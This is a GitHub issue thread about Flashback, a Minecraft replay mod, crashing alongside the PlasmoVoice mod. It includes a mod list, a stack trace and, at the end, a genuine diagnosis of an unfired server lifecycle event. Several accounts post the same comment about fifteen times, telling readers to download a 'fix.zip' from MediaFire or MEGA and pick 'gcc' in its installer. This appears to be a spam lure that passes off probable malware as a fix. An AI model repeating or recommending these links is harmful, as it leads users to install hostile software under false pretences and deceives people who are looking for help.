### ISSUE TITLE
Flashback crashing with PlasmoVoice mod

### ISSUE THREAD

**Issue by TheStepashich** [Moulberry/Flashback#2]
Game crashes when loading saved replay with PlasmoVoice mod. Otherwise, everything works fine. 

Minecraft crash report
```
Minecraft Version: 1.21
...
Fabric Mods: 
		animatica: Animatica 0.6.1 1.21
		axiom: Axiom 3.2.1
			com_moulberry_axiomclientapi_axiomclientapi_: axiomclientapi 1.0.0
			com_moulberry_mixinconstraints: mixinconstraints 1.0.1
		betterf3: BetterF3 11.0.1
		bettermounthud: Better Mount HUD 1.2.4
		calcmod: CalcMod 1.3.2 fabric.1.21
			clientarguments: clientarguments 1.9
			org_mariuszgromada_math_mathparser_org-mxparser: MathParser.org-mXparser 5.0.6
		cameraoverhaul: Camera Overhaul 1.4.1-fabric-universal
		capes: Capes 1.5.4 1.21
		cardinal-components: Cardinal Components API 6.1.0
			cardinal-components-base: Cardinal Components API (base) 6.1.0
			cardinal-components-block: Cardinal Components API (blocks) 6.1.0
			cardinal-components-chunk: Cardinal Components API (chunks) 6.1.0
			cardinal-components-entity: Cardinal Components API (entities) 6.1.0
			cardinal-components-item: Cardinal Components API (items) 6.1.0
			cardinal-components-level: Cardinal Components API (world saves) 6.1.0
			cardinal-components-scoreboard: Cardinal Components API (scoreboard) 6.1.0
			cardinal-components-world: Cardinal Components API (worlds) 6.1.0
		chatanimation: ChatAnimation 1.0.6
		cicada: CICADA 0.8.3 1.21-and-above
		cloth-config: Cloth Config v15 15.0.127
			cloth-basic-math: cloth-basic-math 0.6.1
		continuity: Continuity 3.0.0-beta.5 1.21
		controlify: Controlify 2.0.0-beta.13 1.21-fabric
			dev_isxander_libsdl4j: libsdl4j 3.6896c4c-38
			org_hid4java_hid4java: hid4java 0.7.0
			org_quiltmc_parsers_gson: gson 0.3.0
			org_quiltmc_parsers_json: json 0.3.0
		cubes-without-borders: Cubes Without Borders 2.1.0 1.21
		debugify: Debugify 1.21 1.0
		e4mc_minecraft: e4mc 5.0.0
		emotecraft: Emotecraft 2.5
			bendy-lib: Bendy api 5.0-rc2
			playeranimator: Player Animator 1.0.2-rc1 1.21
		enhancedblockentities: Enhanced Block Entities 0.10.1 1.21
		entity_model_features: Entity Model Features 2.1.3
		entity_texture_features: Entity Texture Features 6.1.3
			org_apache_httpcomponents_httpmime: httpmime 4.5.10
		entityculling: EntityCulling 1.6.6
		explosiveenhancement: Explosive Enhancement 1.2.3-1.21.0
		fabric-api: Fabric API 0.100.6 1.21
			fabric-api-base: Fabric API Base 0.4.42 6573ed8cd1
			fabric-api-lookup-api-v1: Fabric API Lookup API (v1) 1.6.67 b5597344d1
			fabric-biome-api-v1: Fabric Biome API (v1) 13.0.28 6fc22b99d1
			fabric-block-api-v1: Fabric Block API (v1) 1.0.22 0af3f5a7d1
			fabric-block-view-api-v2: Fabric BlockView API (v2) 1.0.10 6573ed8cd1
			fabric-blockrenderlayer-v1: Fabric BlockRenderLayer Registration (v1) 1.1.52 0af3f5a7d1
			fabric-client-tags-api-v1: Fabric Client Tags 1.1.15 6573ed8cd1
			fabric-command-api-v1: Fabric Command API (v1) 1.2.49 f71b366fd1
			fabric-command-api-v2: Fabric Command API (v2) 2.2.28 6ced4dd9d1
			fabric-commands-v0: Fabric Commands (v0) 0.2.66 df3654b3d1
			fabric-content-registries-v0: Fabric Content Registries (v0) 8.0.14 b5597344d1
			fabric-convention-tags-v1: Fabric Convention Tags 2.0.17 7f945d5bd1
			fabric-convention-tags-v2: Fabric Convention Tags (v2) 2.4.1 86024ea6d1
			fabric-crash-report-info-v1: Fabric Crash Report Info (v1) 0.2.29 0af3f5a7d1
			fabric-data-attachment-api-v1: Fabric Data Attachment API (v1) 1.1.24 6a6dfa19d1
			fabric-data-generation-api-v1: Fabric Data Generation API (v1) 20.2.11 16c4ae25d1
			fabric-dimensions-v1: Fabric Dimensions API (v1) 4.0.0 6fc22b99d1
			fabric-entity-events-v1: Fabric Entity Events (v1) 1.6.12 6fc22b99d1
			fabric-events-interaction-v0: Fabric Events Interaction (v0) 0.7.10 e633f883d1
			fabric-game-rule-api-v1: Fabric Game Rule API (v1) 1.0.53 6ced4dd9d1
			fabric-item-api-v1: Fabric Item API (v1) 11.0.0 afdfc921d1
			fabric-item-group-api-v1: Fabric Item Group API (v1) 4.1.2 78017270d1
			fabric-key-binding-api-v1: Fabric Key Binding API (v1) 1.0.47 0af3f5a7d1
			fabric-keybindings-v0: Fabric Key Bindings (v0) 0.2.45 df3654b3d1
			fabric-loot-api-v2: Fabric Loot API (v2) 3.0.12 3f89f5a5d1
			fabric-loot-api-v3: Fabric Loot API (v3) 1.0.0 3f89f5a5d1
			fabric-message-api-v1: Fabric Message API (v1) 6.0.13 6573ed8cd1
			fabric-model-loading-api-v1: Fabric Model Loading API (v1) 2.0.0 fe474d6bd1
			fabric-object-builder-api-v1: Fabric Object Builder API (v1) 15.1.12 d132[1076](https://mclo.gs/MheRwv2#L1076)d1
			fabric-particles-v1: Fabric Particles (v1) 4.0.2 6573ed8cd1
			fabric-recipe-api-v1: Fabric Recipe API (v1) 5.0.10 65089712d1
			fabric-registry-sync-v0: Fabric Registry Sync (v0) 5.0.24 6ced4dd9d1
			fabric-renderer-api-v1: Fabric Renderer API (v1) 3.3.0 0ae0b97dd1
			fabric-renderer-indigo: Fabric Renderer - Indigo 1.6.5 48fb1586d1
			fabric-renderer-registries-v1: Fabric Renderer Registries (v1) 3.2.67 df3654b3d1
			fabric-rendering-data-attachment-v1: Fabric Rendering Data Attachment (v1) 0.3.48 73761d2ed1
			fabric-rendering-fluids-v1: Fabric Rendering Fluids (v1) 3.1.6 b5597344d1
			fabric-rendering-v0: Fabric Rendering (v0) 1.1.70 df3654b3d1
			fabric-rendering-v1: Fabric Rendering (v1) 5.0.4 5a8c785ed1
			fabric-resource-conditions-api-v1: Fabric Resource Conditions API (v1) 4.2.1 d153f344d1
			fabric-screen-api-v1: Fabric Screen API (v1) 2.0.24 b5597344d1
			fabric-screen-handler-api-v1: Fabric Screen Handler API (v1) 1.3.81 b5597344d1
			fabric-sound-api-v1: Fabric Sound API (v1) 1.0.23 6573ed8cd1
			fabric-transfer-api-v1: Fabric Transfer API (v1) 5.1.15 3dccd343d1
			fabric-transitive-access-wideners-v1: Fabric Transitive Access Wideners (v1) 6.0.12 6573ed8cd1
		fabric-language-kotlin: Fabric Language Kotlin 1.11.0 kotlin.2.0.0
			org_jetbrains_kotlin_kotlin-reflect: kotlin-reflect 2.0.0
			org_jetbrains_kotlin_kotlin-stdlib: kotlin-stdlib 2.0.0
			org_jetbrains_kotlin_kotlin-stdlib-jdk7: kotlin-stdlib-jdk7 2.0.0
			org_jetbrains_kotlin_kotlin-stdlib-jdk8: kotlin-stdlib-jdk8 2.0.0
			org_jetbrains_kotlinx_atomicfu-jvm: atomicfu-jvm 0.24.0
			org_jetbrains_kotlinx_kotlinx-coroutines-core-jvm: kotlinx-coroutines-core-jvm 1.8.1
			org_jetbrains_kotlinx_kotlinx-coroutines-jdk8: kotlinx-coroutines-jdk8 1.8.1
			org_jetbrains_kotlinx_kotlinx-datetime-jvm: kotlinx-datetime-jvm 0.6.0
			org_jetbrains_kotlinx_kotlinx-serialization-cbor-jvm: kotlinx-serialization-cbor-jvm 1.6.3
			org_jetbrains_kotlinx_kotlinx-serialization-core-jvm: kotlinx-serialization-core-jvm 1.6.3
			org_jetbrains_kotlinx_kotlinx-serialization-json-jvm: kotlinx-serialization-json-jvm 1.6.3
		fabricloader: Fabric Loader 0.16.0
			mixinextras: MixinExtras 0.4.0
		fabricskyboxes: FabricSkyBoxes 0.7.4 mc1.21
		fabrishot: Fabrishot 1.14.0
		fancyhealthbar: FancyHealthBar 1.1.0
		ferritecore: FerriteCore 7.0.0
		flashback: Flashback 0.2.0
		fog: Fog 1.1.0-1.21
			architectury: Architectury 13.0.6
		freecam: Freecam (Modrinth Edition) 1.3.0 mc1.21
		fsb-interop: FabricSkyBoxes Interop 1.4.0 mc1.21-build.54
		immediatelyfast: ImmediatelyFast 1.2.18 1.21
			net_lenni0451_reflect: Reflect 1.3.4
		immersiveui: ImmersiveUI 0.1.1
		indium: Indium 1.0.34 mc1.21
		iris: Iris 1.7.3 mc1.21
			io_github_douira_glsl-transformer: glsl-transformer 2.0.1
			org_anarres_jcpp: jcpp 1.4.14
			org_antlr_antlr4-runtime: antlr4-runtime 4.13.1
		isxander-main-menu-credits: Main Menu Credits 1.2.0
		java: OpenJDK 64-Bit Server VM 21
		languagereload: Language Reload 1.6.1 1.21
		litematica: Litematica 0.18.999-sakura.19
		lithium: Lithium 0.12.7
		malilib: MaLiLib 0.19.999-sakura.7
		maptooltip: Map Tooltip 4.0.0
		minecraft: Minecraft 1.21
		mixintrace: MixinTrace 1.1.1 1.17
		modelfix: Model Gap Fix 1.21-1.6
		modernfix: ModernFix 5.18.6 mc1.21
		modmenu: Mod Menu 11.0.1
			placeholder-api: Placeholder API 2.4.0-pre.2 1.21
		morechathistory: More Chat History 1.3.1
		mr_dynamic_torches: Dynamic Torches 4
		mru: Mineblock's Repeated Utilities 0.4.4 1.21
		nochatreports: No Chat Reports 1.21-v2.8.0
		optigui: OptiGUI 2.3.0-beta.2 1.21
			org_apache_commons_commons-text: commons-text 1.12.0
			org_ini4j_ini4j: ini4j 0.5.4
		orthocamera: OrthoCamera 0.1.7 1.21
		paginatedadvancements: Paginated Advancements 2.4.2
		particlerain: Particle Rain 2.1.2
		plasmovoice: Plasmo Voice 2.0.10
			aopalliance_aopalliance: aopalliance 1.0
			com_google_inject_guice: guice 5.0.1
			fabric-permissions-api-v0: fabric-permissions-api 0.2-SNAPSHOT
			javax_inject_javax_inject: javax.inject 1
		polytone: Polytone 1.21-2.1.1
			net_objecthunter_exp4j: exp4j 0.4.8
		presencefootsteps: Presence Footsteps 1.10.0 1.21
			kirin: Kirin UI 1.19.0 1.21
		puzzle: Puzzle 1.6.3 1.21
			midnightlib: MidnightLib 1.5.7
			puzzle-base: Puzzle Base 1.6.3 1.21
			puzzle-gui: Puzzle GUI 1.6.3 1.21
			puzzle-models: Puzzle Models 1.6.3 1.21
			puzzle-splashscreen: Puzzle Splash Screen 1.6.3 1.21
		reeses-sodium-options: Reese's Sodium Options 1.7.2 mc1.21
		resourcify: Resourcify 1.4.0
			universalcraft: UniversalCraft 342
		rrls: Remove Reloading Screen 5.0.1 mc1.21-fabric
		showmeyourskin: Show Me Your Skin! 1.11.3 1.21
		smoothscrollingrefurbished: Smooth Scrolling Refurbished 1.1.4
		sodium: Sodium 0.5.11 mc1.21
		sodium-extra: Sodium Extra 0.5.7 mc1.21
			caffeineconfig: CaffeineConfig 1.3.0 1.17
		sounds: Sounds 1.1.1 1.21
		voicechat: Simple Voice Chat 1.21.1-2.5.20
			fabric-lifecycle-events-v1: Fabric Lifecycle Events (v1) 2.3.12 6c1df3606a
			fabric-networking-api-v1: Fabric Networking API (v1) 4.2.2 60c3209b6a
			fabric-resource-loader-v0: Fabric Resource Loader (v0) 1.3.0 565991296a
		wakes: Wakes 0.2.5 1.21
			blue_endless_jankson: jankson 1.2.2
			com_github_jdiemke_delaunay-triangulator_delaunaytriangulator: DelaunayTriangulator 1.0.0
			satin: Satin 2.0.0
		wi_zoom: WI Zoom 1.5-MC1.21
		worldedit: WorldEdit 7.3.4 6823-6263244
		yet_another_config_lib_v3: YetAnotherConfigLib 3.5.0 1.21-fabric
			com_twelvemonkeys_common_common-image: common-image 3.10.0
			com_twelvemonkeys_common_common-io: common-io 3.10.0
			com_twelvemonkeys_common_common-lang: common-lang 3.10.0
			com_twelvemonkeys_imageio_imageio-core: imageio-core 3.10.0
			com_twelvemonkeys_imageio_imageio-metadata: imageio-metadata 3.10.0
			com_twelvemonkeys_imageio_imageio-webp: imageio-webp 3.10.0
		yosbr: YOSBR 0.1.2
	Loaded Shaderpack: (off)
	Server Running: true
	Player Count: 0 / 1; []
	Active Data Packs: vanilla
	Available Data Packs: bundle, trade_rebalance, vanilla
	Enabled Feature Flags: minecraft:vanilla
	World Generation: Experimental
	World Seed: 0
	Type: Integrated Server (map_client.txt)
	Is Modded: Definitely; Client brand changed to 'fabric'; Server brand changed to 'fabric'
	Launched Version: 1.21

[09:32:36] [Server thread/ERROR]: Exception stopping the server
--
1232 | java.lang.NullPointerException: Cannot invoke "su.plo.voice.api.server.audio.line.ServerSourceLineManager.clear()" because "this.sourceLineManager" is null
1233 | at su.plo.voice.server.BaseVoiceServer.onShutdown(BaseVoiceServer.java:181) ~[plasmovoice-fabric-1.21-2.0.10.jar:?]
1234 | at su.plo.voice.server.ModVoiceServer.onShutdown(ModVoiceServer.java:97) ~[plasmovoice-fabric-1.21-2.0.10.jar:?]
1235 | at net.fabricmc.fabric.api.event.lifecycle.v1.ServerLifecycleEvents.lambda$static$4(ServerLifecycleEvents.java:63) ~[fabric-lifecycle-events-v1-2.3.1 6c1df3606a-62dcfcd6759e0b16.jar:?]
1236 | at net.minecraft.server.MinecraftServer.handler$bnj000$fabric-lifecycle-events-v1$beforeShutdownServer(MinecraftServer.java:3648) ~[client-intermediary.jar:?]
1237 | at net.minecraft.server.MinecraftServer.method_3782(MinecraftServer.java) ~[client-intermediary.jar:?]
1238 | at net.minecraft.server.integrated.IntegratedServer.shutdown(IntegratedServer.java:228) ~[client-intermediary.jar:?]
1239 | at com.moulberry.flashback.playback.ReplayServer.method_3782(ReplayServer.java:938) ~[flashback-0.2.0.jar:?]
1240 | at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:735) ~[client-intermediary.jar:?]
1241 | at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:281) ~[client-intermediary.jar:?]
1242 | at java.base/java.lang.Thread.run(Unknown Source) [?:?]
1243 | #@!@# Game crashed! Crash report saved to: #@!@# C:\Users\********\AppData\Roaming\PrismLauncher\instances\1.21\.minecraft\crash-reports\crash-2024-08-25_09.32.36-server.txt
```

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by NickAcPT** [comment]
I did a quick skim on Plasmo's source code and the NPE is being thrown in the following snippet of code:
https://github.com/plasmoapp/plasmo-voice/blob/a16b244ca80d174913c672c39596447fe40dc301/client/src/main/java/su/plo/voice/client/mixin/MixinServerPlayer.java#L43

It seems that `ModServerLib.INSTANCE` is null. It is set by the `ModServerLib#onInitialize` method. The method in question is called by a `ServerLifecycleEvents.SERVER_STARTED` event.

Flashback sets up the Replay Server in the following snippet, which reminds me of vanilla's singleplayer server logic.
My hunch is that this event isn't being fired by the Fabric API since it's not aware of it.

https://github.com/Moulberry/Flashback/blob/67314cd5ef7a36b24247e1b4cf17154a76f5b150/src/main/java/com/moulberry/flashback/mixin/MixinMinecraft.java#L295-L300

And here's how the fabric api invokes the event: https://github.com/FabricMC/fabric/blob/343cdcb01bd7635227471160d2ddb8f612e1bf3a/fabric-lifecycle-events-v1/src/main/java/net/fabricmc/fabric/mixin/event/lifecycle/MinecraftServerMixin.java#L52-L55
